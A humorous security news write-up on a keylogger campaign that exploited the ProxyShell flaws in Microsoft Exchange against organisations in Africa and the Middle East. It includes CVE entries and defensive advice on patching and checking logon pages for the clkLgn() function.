Alert: Keylogger Malware Hijacks Microsoft Exchange Servers – African and Middle Eastern Entities Under Cyber Siege!

Cyber villains are sneakily keylogging their way through the Middle East and Africa, leveraging ancient spells—er, flaws—in Microsoft Exchange Server. With a digital sleight of hand, they’ve left over 30 entities fumbling for their credentials since 2021. Keep your eyes peeled for the clkLgn() mischief!

Hot Take:

Well, it seems like someone’s been playing too much “Spy vs. Spy” in the tech realm. Those sneaky threat actors are at it again, turning Microsoft Exchange Servers into their own personal confessionals where the passwords are the sins. And if you’re in Africa or the Middle East, you might want to double-check your server’s diary entries. It’s like a digital “Ocean’s Eleven,” but instead of robbing casinos, they’re lifting credentials. Who knew cybersecurity could have such a soap opera twist?

Key Points:

  • Unknown cyber villains are using old flaws in Microsoft Exchange to slip in a keylogger, like a bad roommate copying your diary key.
  • They’re not choosy—government agencies, banks, and schools across Africa and the Middle East are all on the hit list.
  • The digital heist began in 2021, exploiting the ProxyShell vulnerabilities that are so last season (patched in May 2021).
  • These cyber intruders are like magicians, making credentials appear in files as if by magic—or, well, by clicking the sign-in button.
  • Positive Technologies is scratching their heads on who’s behind this, but they do offer some sage advice: update and check your server for digital footprints.
Title: Microsoft Exchange Server Remote Code Execution Vulnerability
Cve id: CVE-2021-34473
Cve state: PUBLISHED
Cve assigner short name: microsoft
Cve date updated: 12/28/2023
Cve description: Microsoft Exchange Server Remote Code Execution Vulnerability

Title: Microsoft Exchange Server Elevation of Privilege Vulnerability
Cve id: CVE-2021-34523
Cve state: PUBLISHED
Cve assigner short name: microsoft
Cve date updated: 12/28/2023
Cve description: Microsoft Exchange Server Elevation of Privilege Vulnerability

Title: Microsoft Exchange Server Security Feature Bypass Vulnerability
Cve id: CVE-2021-31207
Cve state: PUBLISHED
Cve assigner short name: microsoft
Cve date updated: 12/28/2023
Cve description: Microsoft Exchange Server Security Feature Bypass Vulnerability

Need to know more?

When Servers Become Diaries:

Imagine your server is like your middle school diary, and there's a nosy sibling—only this time, it's a cyber attacker flipping through the pages. They're targeting a who's who list of entities in Africa and the Middle East and seem to have a particular taste for the VIPs of society: government, banks, you name it. It's like the attackers are on a virtual safari, and every server is a photo op.

The Time Machine of Exploits:

The cyber baddies are exploiting ProxyShell vulnerabilities, which is so 2021. Come on, threat actors, at least keep up with the times! These flaws were patched faster than you can say "software update," but it seems like some folks missed the memo. The result? A sneaky bit of code inserted into the server's main squeeze, "logon.aspx," which might as well be renamed "stealme.aspx."

The Invisible Hand:

The attackers are like digital pickpockets, slipping their keylogger into the server's main page with the precision of a street magician. Before you know it, your credentials are being whisked away to an online file, ready to be plucked by the attacker at a moment's notice. It's a modern-day "Artful Dodger" scenario, and your server is Oliver Twist.

Who Done It?:

The folks at Positive Technologies are playing detective, but even they can't pin the tail on this donkey yet. Is it a lone wolf? A cyber syndicate? The digital mafia? Whoever they are, they're playing the long game, and our cybersecurity experts are still piecing together this jigsaw puzzle of digital deceit.

The Fixer-Upper:

If you're sweating bullets over your server's security, take a leaf out of Positive Technologies' book: update your servers, and play a game of "I Spy" with your Exchange Server's main page. Look for signs of cyber tampering, especially around that clkLgn() function—because if there's something strange in your server neighborhood, who you gonna call? IT support!

And remember, if you find that your server has been compromised, it's not enough to just wave a white flag. You've got to play cleanup crew, scrubbing away the digital fingerprints these cyber culprits left behind. Secure the stolen account data, and say adios to the hacker's file stash. It's time to turn your server's security from a comedy of errors into an impenetrable fortress.

Tags: CVE-2021-31207, CVE-2021-34473, CVE-2021-34523, keylogger malware, Microsoft Exchange Server, Middle East and Africa targeted, Positive Technologies, ProxyShell vulnerabilities